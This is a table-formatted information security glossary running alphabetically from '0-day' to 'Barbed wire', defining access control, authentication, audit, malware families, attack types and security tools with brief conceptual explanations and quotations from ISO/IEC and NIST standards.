Term
|
Meaning
|
0-day
|
See zero-day.
|
3DES
|
See triple-DES.
|
2G, 3G,
3½G, 4G, 5G …
|
Second and successive generations of the digital network used by devices such as cellphones/smartphones and
USB modem sticks for voice calls, SMS/TXT
messaging and data
communications including mobile Internet
access. Defined
by the ITU under the International Mobile Telecommunications-2000 (IMT-2000)
and successive standards.
The 5G standards were introduced in 2017 with networks and consumer devices
on the way.
|
419
|
Section number of the Nigerian penal code criminalizing advance fee frauds.
Often refers to other social
engineering scams
as well, hence email
scammers are known colloquially as “419ers”.
|
AAA
(Authentication, Authorisation and
Accounting)
|
The main IT
security controls
associated with the logon
process i.e. authentication
to verify
the user’s claimed identity, authorisation or
allocation of the user’s defined access rights and permissions, and logging key details concerning the user’s
login and subsequent activities for accountability purposes. See also I&A.
|
ABAC
(Attribute Based Access Control)
|
“An access control method where subject requests to
perform operations on objects are granted or denied based on assigned
attributes of the subject, assigned attributes of the object, environment
conditions, and a set of policies that are specified in terms of those attributes
and conditions” (NIST SP800-162).
|
ABUEA
(Attribute-Based Unlinkable Entity Authentication)
|
A means for people to authenticate themselves anonymously,
without revealing so much personal information that their identity can be
‘linked’ (inferred or determined), compromising their privacy. See ISO/IEC 27551.
|
Access
|
The ability of a person, computer program etc. to
enter, interact with, use or misuse a controlled resource such as information, a site,
building, facility, room, system,
network, database, file, filing
cabinet, directory, disk or other device.
|
Access
authority
|
Organisation,
department, person, system,
program or function that determines whether to grant or deny access to controlled information assets such as personal
information. See also reference monitor.
|
Access
card, proximity card,
pass card, access badge,
staff pass, ID card,
RFID (Radio Frequency IDentification)
tag etc.
|
Authentication
device that (normally)
communicates wirelessly with a card reader (normally) located at an access controlled
door or gate to determine whether the expected card holder is authorized to
proceed. Vulnerable
to being lost, stolen or handed to someone else, and perhaps cloned or hacked. Often carries the authorized holder’s
photograph as well, giving alert and diligent security guards, receptionists and
other workers the
chance to determine at a glance whether the person presenting, wearing or using
the card resembles the mugshot (assuming they have not simply replaced the
photo or faked the
entire pass!).
|
Access
control
|
Security
control intended to govern access to an asset, permitting authorized and appropriate access whilst
preventing unauthorized
or inappropriate access. May be physical (such as a lock), electronic/digital (such as encryption), or procedural (such
as a nightclub bouncer checking the VIP guest list for the name on
your photo-ID). Often critically important, implying the need for strong assurance that it
is correctly designed,
implemented, configured, operating, managed and controlled. “Means to
ensure that access to assets is authorized and restricted based on business
and security requirements” (ISO/IEC 27000).
|
Access gateway
|
“A gateway that provides the system user access to
multiple security domains from a single device, typically a workstation” (NZ information security manual).
|
Access
matrix
|
Table relating users
or their rôles (on one axis) to the IT systems, application
functions and/or classes
of data (on the
other axis), showing the types of access
permitted and/or
denied (within the body of the table).
|
Access Point
(AP),
wireless access point
|
Network
router providing Wi-Fi
services, generally on a wired LAN. “A device that logically connects
wireless client devices operating in infrastructure to one another and
provides access to a distribution system, if connected, which is typically an
organisation’s enterprise wired network” (NIST SP 800-48 and
SP 800-121). “Device or piece of equipment that allows
wireless devices to connect to a wired network. Note: The connection uses a
wireless local area network (WLAN) or related standard.” (ISO/IEC 27033-6).
|
Access
policy,
access control policy
|
Security
policy or a set of defined rules determining authorized and controlled access to information assets such as functions,
tables or records
in a database, or
programs, files and directories on an IT system, or IT systems on a network, or
locations (sites, buildings, rooms, cabinets etc.) holding such assets. Typically used
to configure appropriate access
rights (for example read, write, delete and/or control) for user rôles which
are then assigned to individual users
authorized to perform those rôles (see RBAC).
|
Access
right,
logical access right,
right,
access permission
|
Individual people, systems, programs, organisations etc. may be granted
or denied access
to controlled resources such as data,
transactions/functions or physical locations according to whether the access
is authorized
i.e. their logical
access rights, permissions
or attributes match the access rules
or criteria associated with those resources according to the access policy.
May be documented
in the form of an access
matrix or permit.
See also right.
|
Accident
|
While information
security incidents
may result from deliberate acts by hackers,
malware, fraudsters, spies etc., the
greater proportion by number are in fact the result of inadvertent or
unintentional acts, natural or chance events, or errors. Physical accidents and
health-and-safety failures that befall workers constitute information security
incidents since people are information assets.
|
Accommodation address
|
Mail drop used for convenience and sometimes to conceal
the true location/identity
of a fraudster
by giving the appearance of belonging to a legitimate business or an innocuous member
of the general public.
|
Account
hijack,
account takeover
|
Taking unauthorized
control of a target’s bank,
credit card, email,
IT system or
telephone account by means of hacking,
social
engineering, malware
etc., typically as part of identity
fraud or some other attack.
|
Accountable,
accountability,
held to account
|
Someone (a person or organisation) who is held accountable for
something (such as a privacy
breach or some
other incident)
may be sanctioned in some way (‘held to account’) by an authority if they do not fulfil their obligations.
Sanctions may include penalties, disciplinary action, dismissal, prosecution,
withdrawal of privileges
etc. In contrast to responsibility,
accountability is a sticky property that cannot be unilaterally delegated or
passed by the accountable person or organisation to another, in other words the
buck stops here. “Required or expected to justify actions or
decisions; being answerable and responsible” (NZ information security manual).
|
Accounting,
account
|
Whereas normally the term implies financial
accounting, the underlying principles
and practices of systematically, formally and thoroughly recording and
cross-checking various details such that relevant parties can be held to account
for their activities are more widely applicable. Most IT systems, for instance, can
automatically record
information
about user logons, use of privileges and
overrides, alerts,
alarms and other
potentially significant events
in their log or
accounting files, with utilities to search and report on them, even if these
days they are no longer required to re-charge users for their use of the
computers (common practice prior to the 1990s).
|
Accreditation
|
The process of checking that an organisation or individual is competent to
check and certify others, to a level specified by some trusted authority. Often confused with certification,
the process of issuing certificates. “A procedure by which an
authoritative body gives formal recognition, approval and acceptance of the
associated residual security risk with the operation of a system and issues a
formal approval to operate the system” (NZ information security manual).
|
Accurate
|
Precise, truthful and valid, faithfully representing factual
reality. An integrity
property.
|
ACL
(Access Control List)
|
Security metadata
associated with a computer file, directory, disk, port etc. specifying, for example,
which users may or
may not access or
change the object’s security
settings, and whether successful and/or unsuccessful attempts to do so are logged. ACL
capabilities vary between operating
systems.
|
Acquirer
|
“Stakeholder that procures a product or service from
another party. Note: Procurement may or may not involve the exchange of
monetary funds.” (ISO/IEC
27036-1).
|
Acquisition
|
Initial phase or activity in the process of gathering, analysing and
presenting forensic
evidence, or procuring a product. “Process of creating a copy
of data within a defined set. Note: The product of an acquisition is a
potential digital evidence copy.” (ISO/IEC 27037). “Process for
obtaining a product or service” (ISO/IEC 27036-1).
|
Active Directory
Federation Services
(ADFS)
|
Proprietary Microsoft technology blending LDAP
(Lightweight Directory Access Protocol) with SAML for identification
and authentication, authorisation
and access control
purposes.
|
Active
shooter,
active killer
|
Suicidal terrorist
or brutally unhinged nutcase, often armed, who indiscriminately and violently
attacks innocent
people with intent to injure or kill as many as possible before being
arrested, disabled or killed. An extreme safety threat to everyone in the vicinity.
|
ActiveX
|
Microsoft technology for interactive web pages. Malicious ActiveX
controls (a form of malware)
may potentially compromise
the users’ systems: if the
browser security settings allow, even unauthenticated (‘unsigned’) ActiveX
controls may access
files on the user’s hard drive for example. Microsoft dropped Active X
support from its browsers in 2016.
|
Activist
|
Relatively mild extremist.
|
Actuary
|
A professional (typically employed by insurance companies)
who uses probability theory and mathematical techniques to analyse data and so quantify
and hence manage risk
with scientific rigor.
|
Acunetix
|
Hacking/penetration testing
tool.
|
Ad
injection
|
Browser malware
that displays advertisements and (in some cases) steals personal
information from infected
systems. See also
adware, XSS and HTML injection.
|
Administrative
account
|
See privileged user. “A user account with
full privileges on a computer. Such an account is intended to be used only
when performing personal computer (PC) management tasks, such as installing
updates and application software, managing user accounts, and modifying
operating system (OS) and application settings” (NIST SP800-114 rev1).
|
Administrative control
(ADCON)
|
See manual
control and management
control. ADCON is a US Navy abbreviation.
|
Admissible
|
Forensic
evidence must be trustworthy
if it is to be presented in court. Evidence that is dubious for some reason
(e.g. if there is reasonable doubt that it was in fact properly
collected, stored and analysed in full accordance with applicable laws,
regulations and standards
of good forensic practice) may be ruled
inadmissible by the judge and hence cannot be used to support or refute a
case.
|
Advance
fee fraud
|
Type of fraud
in which the fraudster
fools a naïve and vulnerable
victim into
sending money as ‘advance fees’ supposedly in order to secure a substantial
payout (such as an inheritance or lottery win) or other benefit (such as an
immigration visa) which, strangely enough, gets tantalizingly close but never
quite materializes. Commonly known as a 419 scam. Originally perpetrated by letter,
Telex and FAX but latterly more often by email, SMS/TXT, social media etc. Commonplace
form of social
engineering.
|
Adversary
|
An enemy of the organisation such as a malicious person,
group or organisation. May be a worker,
fraudster, hacker, competitor, pressure
group, government or terrorist,
who is willing to attack
and harm the organisation in some way (not necessarily physically) e.g. VXers, insider threats,
lobbyists, rumour-mongers, saboteurs
and cyberteurs.
A threat agent.
|
Adware
|
Annoying software
that displays advertisements etc. Considered by some to be malware since it is
often covert,
seldom knowingly authorized,
consumes resources and may have undesirable side-effects. See also ad injection. “Application
which pushes advertising to users and/or gathers user online behavior. NOTE
The application may or may not be installed with the user’s knowledge or
consent or forced onto the user via licensing terms for other software.” (ISO/IEC 27032).
|
Adwind,
AlienSpy, Frutas, Unrecom, Sockrat, JSocket, jRat
|
Heavily obfuscated
species of RAT malware available to rent on the black market (MaaS). Built using Java
so it can run on Windows, Linux, Android, MacOS and other systems with Java capabilities. Frutas
was first discovered in 2012 and variants were still in the wild as of 2018.
|
AES
(Advanced Encryption Standard)
|
‘Military grade’ cryptographic algorithm chosen by NIST in 2001 to
replace DES and
specified in the standard
FIPS 197. A symmetric block cipher
generally understood to be strong, but widespread distrust of the NSA following Ed
Snowden’s revelations casts doubt on that assertion.
|
Affirmative cyber risk
|
Cyber
incidents explicitly covered in cyberinsurance or other forms of insurance. Cf.
non-affirmative
cyber risk.
|
Agent
|
(a) Person who somehow (usually covertly) obtains legitimate access to confidential proprietary or personal
information but betrays their position of trust by disclosing or permitting access to the information by
an unauthorized
third party
(sometimes unwittingly), typically through a collector. See also spy. (b) A benign or malicious program, person or organisation
acting on behalf of another, for example gathering and passing-on data from one system or network for
collation and analysis centrally in conjunction with data fed by agents
running on other systems or networks.
|
Agent
provocateur
|
French term literally translated as ‘agent who provokes’, meaning a secret
agent who infiltrates
an organisation
and incites them to act illegally in such a way that they are likely to be
caught in the act. A cyberteur.
|
Agreement
|
Joint commitment of two or more parties to a shared objective.
“Mutual acknowledgement of terms and conditions under which a working
relationship is conducted” (ISO/IEC 27036-1).
|
Aggregation
|
The collection of information from disparate sources, for
example to profile
a target. Due to
explicit and/or inferred
relationships between items of information, aggregation and subsequent
analysis can generate new knowledge,
hence databases are
usually more valuable than the unorganised data items they contain: the whole is
greater than the sum of the parts.
|
Aircrack
ng
|
Wi-Fi
network hacking and penetration testing
tool, capable of cracking WEP,
WPA and WPA2/PSK.
|
Air gap
|
Complete physical and logical separation between
entities, for example isolating highly-secure networks from less-secure ones by
prohibiting any connections between them. Tends to fail-insecure, in other words if the
air-gap is somehow breached,
the destination tends to be highly vulnerable if excessive trust (faith) or reliance was placed on
the air-gap.
|
Air lock, air-lock,
airlock
|
See man
trap.
|
Alarm
|
Audio/visual warning of the occurrence of a critical security
and/or safety condition (e.g. fire/smoke, intruder, flood, gross system integrity failure) or incident requiring an urgent, high-priority
response. See also alert.
|
Alert
|
(a) Warning that a critical system security event (e.g. audit or security log file full, system shutdown initiated,
user authentication
failure) has occurred. While definitions vary, alerts generally signal
important but not necessarily critical conditions requiring less urgent
responses than alarms.
They are usually logged
for analysis and follow-up action if and when convenient. (b) A state of awareness,
vigilance and preparedness to react appropriately to events and incidents. “’Instant’ indication that
an information system and network may be under attack, or in danger because
of accident, failure or human error” (ISO/IEC 27033-1).
|
Algorithm,
cipher,
cypher
|
Mathematical function, process and/or protocol at the heart of a cryptosystem.
Determines the specific sequence of actions or operations necessary, for
example, to encrypt
the plaintext
and decrypt the cyphertext, or
to calculate and verify
a hash.
|
Allocated
space
|
“Area on digital media, including primary memory, which
is in use for the storage of data, including metadata” (ISO/IEC 27037).
|
Amplification attack,
reflection attack
|
Type of attack
in which network
servers are tricked
into transmitting a large volume of traffic to a target system, potentially overloading it and causing
Denial of Service.
NTP, DNS or other request packets
with spoofed
source IP addresses matching the target are sent to one or more network
servers which then forward their responses to the target instead of the
originator. See also DRDoS.
|
AMT
(Active Management Technology)
|
Intel incorporate hardware subsystems into some of their
CPU chips to facilitate low-level system
management.
In May 2017, Intel disclosed
a design flaw in
AMT that creates a severe vulnerability
allowing hackers
to gain privileged
access to systems
using the “Q series” chipset, either locally or through the network. The wisdom of allowing
low-level privileged system management in this way, through hardware that
bypasses normal BIOS
and operating system
security (a backdoor),
is in question.
|
Analysis
|
The process
of systematically analysing (exploring, investigating or evaluating)
something (such as risks,
incidents or forensic evidence)
in depth. “Process of evaluating potential digital evidence in order to
assess its relevance to the investigation. Note: Potential digital evidence,
which is determined to be relevant, becomes digital evidence.” (ISO/IEC 27042).
|
Analytical
model
|
Mathematical formula for generating metrics (such as a positive trend in a
relevant security parameter) from measurements (normally a time series of
values of the parameter), giving meaning to the numbers (“See, things are improving!”).
“Algorithm or calculation combining one or more base measures
and/or derived measures with associated decision criteria” (ISO/IEC 27000).
|
Anarchy,
anarchism,
anarchist
|
For ideological or other reasons, anarchists typically
seek to overthrow the government and disrupt organised society by (among
other things) sabotaging
vulnerable
parts of the critical [national]
infrastructure.
|
Angler
|
A crimeware
kit, in the
wild in 2016.
|
Angry
IP Scanner,
ipscan
|
Network
administration/security/penetration
testing tool vaguely similar to nmap. It scans (queries) IP address and
port ranges to identify network
nodes.
|
Anomaly,
anomalous
|
Something different, unusual, unexpected or out of the
ordinary. While large data
anomalies (such as numerous data values completely missing for a significant
period) may be easily spotted by eye (provided someone is actually looking!),
small anomalies in large data sets or databases
can be identified much more easily and reliably by systematic statistical
analysis e.g. applying Benford’s law. Such anomalies are
inherently interesting, hinting at the possibility of unexpected relationships,
biases or events, perhaps even information
security incidents
such as bugs, flaws, frauds, malware or hacks in progress.
|
Anonymity
|
A person’s ability or right to go about their life and business
while withholding their identity,
for example whistleblowing
or for privacy
reasons. Typically achieved through discretion, sometimes through a trusted third party
using techniques such as anonymisation,
tokenisation
or redaction.
|
Anonymisation
|
The redaction
of information
needed to identify specific individuals in a database, document etc. for example by tokenisation,
usually for privacy
reasons.
|
Anonymous
|
(a) Information that is not and cannot be linked
unambiguously to a specific, identifiable originator or source. (b) The name
of a “hacker collective”, a loosely-organised and indistinct group or
movement of pranksters, hackers,
digital vigilantes and subversive hacktivists active since 2004. Their
proclamations famously include the line “We are legion” spoken in a synthetic
voice emanating from a stylized mask. See also LulzSec.
|
Anti-pass-back
|
Physical
security access
control arrangement such as a man trap designed to prevent someone presenting
their access card
to open a one-person-at-a-time controlled
entrance for themselves, then handing their card back to someone else (typically
an unauthorized
visitor) permitting
them also to access the controlled area. Electronic access control systems may keep
track of people, preventing them from re-accessing an area unless they have
previously exited it, requiring them to present their access cards at both entry and
exit points. “A security mechanism preventing an access card or similar
device from being used to enter an area a second time without first leaving
it (so that the card cannot be passed back to a second person who wants to
enter).” (PCI Card Production and Provisioning Physical
Security Requirements, v2.0 January 2017).
|
Antivirus
[software, app, program, package]
|
Software
designed to
minimize the risk
of malware by
detecting, preventing and/or removing infections with viruses, network worms, Trojans, spyware, ransomware, rootkits etc.
|
APN
(Access Point Name)
|
A gateway linking a mobile network to the Internet or another network. Malware may
surreptitiously alter the APN on mobile devices, redirecting users to access points monitored and controlled by hackers.
|
Appliance
|
Computer system
or device dedicated
to a specific purpose, ready to use straight out of the box, requiring little
if any configuration or management.
Consumer networking
equipment such as broadband modems and access points are usually appliances, as
are some commercial firewalls.
Usually built around an embedded
system. Some whiteware (household appliances) are smart.
|
App,
application
|
Computer program or suite of programs providing a useful
function. Apps on smartphones,
tablet and portable PCs, particularly free social media or security apps downloaded
from the Web and installed by naïve users,
may be Trojans, spyware, network worms or other malware, especially
on jailbroken
devices.
|
Application development, software
development,
systems development
|
The process,
method, approach,
phase or stage within which new or updated software is coded (created). Sometimes
taken to include the earlier specification, architecture and design phases, and perhaps the software
testing, version
control, change
and configuration
management, and implementation activities that normally follow
development.
|
Application services
|
“Software with functionality delivered on-demand to
subscribers through an online model which includes web based or client-server
applications” (ISO/IEC
27032).
|
Application whitelist
|
The application of whitelisting to apps. “An approach in which all
executables and applications are prevented from executing by default, with an
explicitly defined set of allowed executables” (NZ information security manual).
|
APT
(Advanced Persistent Threat)
|
A highly sophisticated, sustained and ultimately damaging attack, or a series
of attacks, by a very resourceful, determined and capable adversary. Generally involves a
combination of methods
and tools, such as custom malware,
social
engineering, hacking
(including hacked hardware,
software or firmware,
including things)
and/or physical
intrusion.
|
ARA
(Analog Risk Assessment),
PIG
(Probability Impact Graph)
|
Visual security metric
analysing information
risks in two dimensions according to their relative likelihood or probability
of occurrence (on one axis) and (on the other axis) their relative severity
or potential impacts
on the organisation
if they were to occur. Risks that are both relatively likely and severe, or
those that are heading in that direction, are generally of greater concern
than the remainder and may be displayed in red or on a red background to
catch the readers’ attention.
|
Architecture
|
Overall grand design
or blueprint for an organisation’s
information systems and business
processes,
linking even higher level objectives
from various strategies to lower-level designs for individual systems and
processes. May incorporate the information security architecture. In
the physical
security context, the architectural design of a facility can
enhance or hinder its security. “Fundamental organisation of a system
embodied in its components, their relationships to each other, and to the
environment, and the principles guiding its design and evolution” (ISO/IEC
15288:2008, cited by ISO/IEC 27033-1).
|
Archive,
archival
|
Secure
long-term storage of valuable information,
designed to
ensure its integrity,
availability
and often (but not necessarily) its confidentiality and so maintain its
value. May be required for compliance
reasons e.g. organisations
are obliged
by applicable laws and regulations to provide certain types of business
record several years after they were created. In a few cases, the retention period
is indefinite.
|
Armor
|
Strong protective
plates, typically comprising layers of leather, steel, Kevlar/carbon-fibre/composite
materials and ceramics that absorb and spread the energy, resisting
penetration by weapons such as swords, daggers/knives, shrapnel and bullets.
The physical security
version of hardening.
|
Arson
|
Deliberately setting fire to or burning something without its
owner’s permission, or
with intent to defraud
another (such as an insurance company). A form of sabotage. A threat to many tangible assets.
|
ASLR
(Address Space Layout Randomisation)
|
Security
technique that randomizes memory addressing for processes, function calls etc.,
frustrating hacking
attempts to invoke or replace privileged
functions occupying fixed and hence predictable addresses through buffer overflows
and similar exploits.
See also KASLR.
|
ASP (Application Service
Provider)
|
“Operator who provides a hosted software solution that
provides application services which includes web based or client-server
delivery models. EXAMPLE Online game operators, office application providers
and online storage providers.” (ISO/IEC 27032).
|
Assert,
assertion
|
Unilaterally state or claim something to be true, without
necessarily having or providing the evidence to prove it.
|
Assertive
|
Dominant, coercive,
overbearing or authoritarian, able to exert strong influence on another
without resorting to overt aggression or violence. A powerful technique in
many social
engineering attacks
as well as legitimate
controlling activities (“Hands up! You’re nicked!” for instance).
|
Asset
|
Something of value to its owner whereas if it has little, no or
even negative value to its owner, or is more valuable to another, it may be a
liability. May be tangible (e.g. a building, hardware, signed/executed contract or license/approval,
person, cash, IOU, padlock),
intangible (e.g. knowledge,
experience, know-how, skill,
capability, competence, tradecraft, information,
software,
creative idea, concept, relationship, virtual organisation, brand, reputation, trust, loyalty, goodwill, bank credit, application or service,
right or permission,
understanding, verbal contract, obligation) or indeterminate sharing both tangible and
intangible characteristics (e.g. trademark, patent, firmware, data, database, system, security). See also information asset.
“Anything of value to an agency, such as IT equipment and software,
information, personnel, documentation, reputation and public confidence” (NZ information security manual). “Legal
right or organisational resource which is controllable by an entity and has
the capacity to generate economic benefits” (ISO
10668). “Anything that has value to an individual, an organisation
or a government” (ISO/IEC
27032).
|
Assurance
|
The provision of a certain level of trust, confidence, confirmation or proof
of something, typically by reviewing,
checking, testing, certified compliance
or auditing it. A
security-assured program, for example, has been tested to confirm that
it fulfils information
security requirements.
|
Asymmetric
|
Type of cryptosystem
that uses pairs of mathematically related but quite different public and private keys to either encrypt or decrypt. Although
the pairs of keys are related and are fairly simple to generate (on a
computer at least), it is infeasible to guess or calculate either key from
the other without additional information.
Cf. symmetric.
|
AtomBombing
|
Code
injection exploit
that alters the atom tables used internally by Windows to store and
communicate strings during program execution.
|
ATT&CK
(Adversarial Tactics, Techniques,
& Common Knowledge)
|
MITRE’s knowledgebase of cyber-attack tactics and techniques,
first published in 2015. See attack.mitre.org.
|
Attack
|
Type of information
security incident
actively and deliberately perpetrated by someone (the attacker or adversary)
on one or more victims
(people and/or organisations)
without their permission.
Cf. accident
or act of god. “Attempt to destroy, expose, alter, disable, steal or gain
unauthorized access to or make unauthorized use of an asset” (ISO/IEC 27000).
|
Attacker
|
Person, group or organisation actively mounting one or
more attacks. “Person
deliberately exploiting vulnerabilities in technical and non-technical
security controls in order to steal or compromise information systems and
networks, or to compromise availability to legitimate users of information system
and network resources” (ISO/IEC
27033-1).
|
Attack
surface
|
A notional 3-dimensional representation of the organisation’s
information assets,
risks etc.
where the height axis in some way reflects vulnerabilities and/or their exposure by
various parts of the organisation, forming a complex and dynamic ‘surface’
that might be actively attacked
or exploited by hackers, malware etc.
to the corresponding extent. Implies that improving the protection of
information assets and/or reducing the exposure or extent of vulnerabilities
will somehow improve the organisation’s information security … without specifying
precisely how. A security metric.
See also security
landscape, risk
universe, risk
profile and heatmap.
“The amount of IT equipment and software used in a system. The greater
the attack surface the greater the chances are of an attacker finding an
exploitable vulnerability” (NZ information security manual).
|
Attack toolkit
|
See crimeware.
|
Attagging
|
The use of QRcodes, perhaps stuck over legitimate
QRcodes, containing malicious
JavaScript or URLs linking to infectious
or phishing
websites. Exploits
our inability to interpret them simply by eye.
|
Attest,
attestation
|
Formally documented
assertion by a
duly authorized
and accountable
person that the organisation
complies with
(fulfils the requirements of) particular laws, regulations or professional
practices (such as relevant governance,
accounting and audit
standards).
Although highly stylized and very precisely worded to exclude other
liabilities, the signatories are personally accountable for the veracity of such
statements, hence attestation carries a lot of weight and is taken very
seriously. A surprisingly powerful administrative control, akin to taking an oath.
|
Attribute
|
Characteristic. “Property or characteristic of an object that
can be distinguished quantitatively or qualitatively by human or automated
means” (ISO/IEC
27000).
|
Attribution
|
(a) Acknowledgement referencing the source, originator
and/or owner of intellectual property being
reproduced elsewhere in order to thank them and (hopefully) reduce the risk of being accused
of plagiarism
or copyright
abuse. [Note: strictly speaking, attribution is irrelevant to copyright
infringement but it is ethical
and polite to acknowledge one’s sources.] (b) Cybersecurity incidents are often blamed
on (attributed to) certain perpetrators according to someone’s evaluation of
evidence in the malware
or hacking tools
used, or other clues such as the demands and claims made. However,
perpetrators of illegal acts are (for obvious reasons) keen to remain
undercover and may deliberately mislead the analysts by seeding false leads.
Furthermore, attacks
often involve a blend of code, tools and techniques from disparate sources,
obtained through the hacking
underground scene and used or adapted for the specific purpose at
hand.
|
Audit
|
Structured assurance
process of
examination, review,
assessment, testing and reporting by one or more competent and trusted people who – crucially – are
independent of the subject area being audited. In many organisations,
‘audit’ also refers to the business department or function (usually “Internal
Audit”, “Quality Audit” etc.) and/or third party organisation (more formally
“External Audit”) responsible
for auditing. Derived from the Latin audire (to hear). “Systematic,
independent and documented process for obtaining audit evidence and
evaluating it objectively to determine the extent to which the audit criteria
are fulfilled. Notes: an audit can be an internal audit (first party) or an
external audit (second party or third party), and it can be a combined audit
(combining two or more disciplines); ‘audit evidence’ and ‘audit criteria’ are
defined in ISO 19011” (ISO/IEC
27000). “An independent review of event logs and related
activities performed to determine the adequacy of current security measures,
to identify the degree of conformance with established policy or to develop
recommendations for improvements to the security measures currently applied”
(NZ information Security Manual).
|
Auditability
|
An assurance
objective for
many important IT systems,
processes,
business relationships etc. meaning that they are capable of being audited. Implies the
need to retain high integrity
records of relevant events
and activities (e.g. secure logs) that can be independently reviewed if and when
required.
|
Audit
logging
|
“Recording of data on information security events for
the purpose of review and analysis, and ongoing monitoring” (ISO/IEC 27033-1).
|
Audit
scope
|
Coverage of an audit.
“Extent and boundaries of an audit” (ISO 19011:2011).
|
Audit
tools
|
“Automated tools to aid the analysis of the contents of
audit logs” (ISO/IEC
27033-1).
|
Audit
trail
|
Chronological record of important transactions or stages
in a business or ICT
process, which
may be used to reconstruct the exact sequence of events. An IT system security log, for example, is typically configured
to record details such as successful and failed system logons, privilege use, configuration changes, security alarms and alerts etc. with timestamps.
Since an attacker’s first move after gaining access is often to erase their tracks, the trail should be
protected against tampering, e.g. by forwarding records promptly to a separate, write-restricted log server.
|
AUP
(Acceptable Use Policy)
|
Semi-formal policy
or guideline
laying out and contrasting acceptable against unacceptable use of information, ICT services, systems etc.
in plain English.
|
Authentication,
authenticate
|
Control
process by which
a specific individual user,
system, message,
block of data etc.
is positively identified and confirmed authentic, typically on the basis of
something they know (e.g. a password), something they
have (e.g. a hardware token, smartcard or registered phone),
something they are (meaning biometrics)
and/or where they are (their virtual/network or physical location); requiring two or more
independent factors is multi-factor authentication. Usually
involves cryptography (e.g. salted password hashing, challenge-response protocols or digital signatures).
Authentication is a critically important and hence inherently risky control: if the process fails, is
bypassed, undermined, spoofed or disabled, many other security controls (such
as access controls,
audit trails,
logging
and alerting) are
also rendered ineffective, often with no indication of anything amiss. “Provision
of assurance that a claimed characteristic of an entity is correct” (ISO/IEC 27000).
|
Authentic,
authenticity
|
Verifiably
genuine, not counterfeit
or fake. “Property
that an entity is what it claims to be” (ISO/IEC 27000).
|
Authority
|
Person, rôle, organisation etc. of high status
or seniority (such as a manager,
regulator, government agency, tribal elder or significant other) or a stakeholder
that commands respect, compliance
and/or obedience, thus exerting influence or control over subordinates.
|
Authorisation,
authorize
|
Permitted,
accepted and/or agreed by management
or some other authority
as being in the best interests of the organisation, the workforce, the stakeholders or
society at large. Cf. unauthorized.
|
Autodiscovery
|
Some network
servers and devices advertise
their services (such as multimedia or printing) by routinely broadcasting or multicasting
network messages (e.g. mDNS/Bonjour, SSDP/UPnP or WS-Discovery), allowing them to be ‘discovered’ by other network systems
without manual configuration. The same announcements hand an attacker on the network a free
inventory of what is running, and some (notably SSDP) have been abused for DDoS amplification,
so they should not be reachable from untrusted networks.
|
Automated
control
|
Control
embedded in an electronic or mechanical system capable of operating automatically
without necessarily involving a person in order to function. Cf. manual control.
|
Autonomous
weapon
|
A ‘fire-and-forget’ cyberweapon capable of acting
autonomously or semi-autonomously using smarts (artificial intelligence) to
complete complex reconnaissance, surveillance and/or combat missions with
little if any direct involvement and real-time control by human operators, in contrast
to remote-controlled or dumb weapons. May be a physical device or malware.
|
Autorooter
|
Software
tool (malware)
that automatically scans for and exploits known vulnerabilities, giving hackers
or script kiddies
fully privileged (root/administrator)
access to vulnerable systems with little skill or effort.
|
Availability
|
One of the three core objectives of information security, along with confidentiality
and integrity
(the CIA triad).
Availability concerns the requirement for information, IT systems, people and processes to be operational and
accessible when needed, implying the use of resilience and/or recovery controls to guard against unacceptable
disruption or interruption of necessary services. “Property of being
accessible and usable upon demand by an authorized entity” (ISO/IEC 27000).
|
Avalanche
|
A global criminal botnet
infrastructure used for phishing,
malware
distribution and money
mule recruitment. Dismantled in 2016 in a coordinated international law-enforcement operation.
|
Awareness,
vigilance
|
General appreciation by workers of their rôle in the process of securing the organisation’s
information assets,
for instance through compliance
with policies, laws and
other security obligations
and responsibilities.
Being vigilant for, and responding appropriately to, information security threats, vulnerabilities, near misses, events and incidents is an extremely important form
of control. See
also education,
training and security culture.
|
Axiom
|
A fundamental information
security policy requirement, architectural principle or rule. Axioms may be derived from first principles,
and/or from sources such as the control objectives defined in ISO/IEC 27002 to
justify and underpin the organisation’s
information security
policy statements,
standards, procedures, guidelines and controls.
|
BabyShark
|
Malware
species (a Visual Basic Script downloader and reconnaissance tool, first reported in 2019) used by the Kimsuky
hacker group associated with North Korea.
|
Back channel
|
See covert
channel.
|
Backdoor,
trapdoor
|
Hidden control bypass function in a program (e.g. an undocumented command or
a hard-coded credential) allowing users to access the system without
proper authorisation.
Sometimes coded in for legitimate
software
development, testing or support purposes (e.g. ‘cheat codes’ used to bypass the early
stages in an electronic game or make a game character invincible, immune to attacks),
occasionally for dubious, unethical,
nefarious or malicious
purposes (e.g. hacking,
coercion, embezzlement, fraud, espionage or covert license compliance
checks, or introduced by malware).
|
Background
check
|
Pre-employment screening process that evaluates a new starter’s
social and family background, identity, employment record, immigration
status, criminal record, credit status etc. to identify security and trustworthiness
issues. A service often provided by specialist suppliers. The nature,
extent and thoroughness of the checks varies widely in practice due to legal
and time constraints, privacy
concerns, policy,
costs and practicalities, the particular rôle etc. See also security clearance
and positive vetting.
|
Backup
|
Snapshot copy of data,
programs, configurations etc. from an IT system at a given point in time.
Backups provide the ability to restore a system to a known state after an incident (such as
a ransomware
infection) but are generally not intended to last as long as archives. Integrity and availability
are critical concerns for backups, plus confidentiality if the information
content is sensitive,
hence backups must be risk-assessed
and secured,
normally by means of documented
policies and procedures, redundancy,
firesafes, off-line and off-site storage (ransomware that can reach a network-attached backup
will encrypt or delete it too, so at least one copy should be offline or immutable), encryption, testing to prove
recoverability, oversight/monitoring
etc.
|
BadRabbit
|
One of several species
of ransomware
in the wild
that surreptitiously encrypts
victims’ data, coercing them into
paying a ransom
for the decryption
keys. Appeared in 2017, spreading via a fake Adobe Flash update served from compromised websites, mainly in Russia and Ukraine.
|
Badge access
|
See access
card.
|
Bailey
|
Courtyard in a Mediaeval castle.
|
Baiting
|
Social
engineering method of [figuratively] dangling something attractive
in front of victims,
such as a 419 or phishing email,
what appears to be a dropped/lost USB stick, or an advertisement, web page etc.,
typically containing malware.
|
Bait-and-switch
|
Ancient social engineering trick in which a victim is enticed to
purchase an attractive display item that is then surreptitiously substituted
by an item of much lesser value.
|
Balancing
control
|
Control
that involves reconciling
complementary (equal and opposite) values, as in double-entry
bookkeeping etc.
|
Bank
Trojan,
banking Trojan,
online banking Trojan,
banker Trojan
|
Trojan
(such as Zeus) that captures user authentication credentials (typically by keylogging or form grabbing) or hijacks web sessions (usually via man-in-the-browser attacks that inject fraudulent content into the banking site as rendered in the victim’s browser) to steal funds from online bank accounts.
|
Barbed
wire
|
Fencing wire with sharp barbs evenly spaced every few
inches to snag the clothing and prick the skin of any intruders foolish enough to climb over.
A physical
security control
with some deterrent
effect, though less extreme than razor wire or spikes.
